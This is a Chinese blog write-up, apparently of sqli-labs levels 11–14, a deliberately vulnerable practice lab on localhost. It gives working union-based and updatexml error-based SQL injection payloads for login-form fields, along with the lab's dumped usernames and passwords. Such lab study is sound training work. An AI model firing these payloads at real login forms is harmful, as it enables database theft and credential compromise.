sqli-11-14关-2020-04-17

十一关

http://127.0.0.1/sqli/Less-11/

 

 

 看到这个页面,添个admin,admin在说.

 

 

 什么情况,竟然出现这个结果.那么在乱填一个.

 

 

 

 

 

 明显不一样了.那么我还是抓包处理一下.

抓到包,我们可以尝试重发测试.

 

 

 看到数据库报错,第一个时间想到这点有漏洞.

 

 

uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit  #得知有2列数

uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit  #得到数据库security

uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit  #得到数据表emails,referers,uagents,users

uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit  #得到数据表users的字段

user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit  #数据表users的username和password的数据

Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

第十二关

直接说这么找注入点和闭合点

uname=xxeyuki'&passwd=33yuki&submit=Submit  #单引号没有任何反应

uname=xxeyuki"&passwd=33yuki&submit=Submit  #有反应了,很明显的数据库报错。

 

 

 ")这闭合好像非常明显

uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit  #3报错,2没有报错 确定列数2

uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit  #得到数据库security

uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit  #数据表 users

uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit  #字段username,password

uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit  #用户名和密码数据

 十三关

uname=admin'&passwd=admin&submit=Submit  #看到这个弹出这个我就大概确定闭合是')

ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1

uname=admin') order by 2#&passwd=admin&submit=Submit  #确定列数为2

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit  #爆字段,无语只能17个字符

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #只能一个个爆了

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #密码字段

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #密码

十四关

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #爆用户名

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #爆密码

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

  

 

posted @ 2020-04-17 09:44  llcnKill  阅读(314)  评论(0编辑  收藏  举报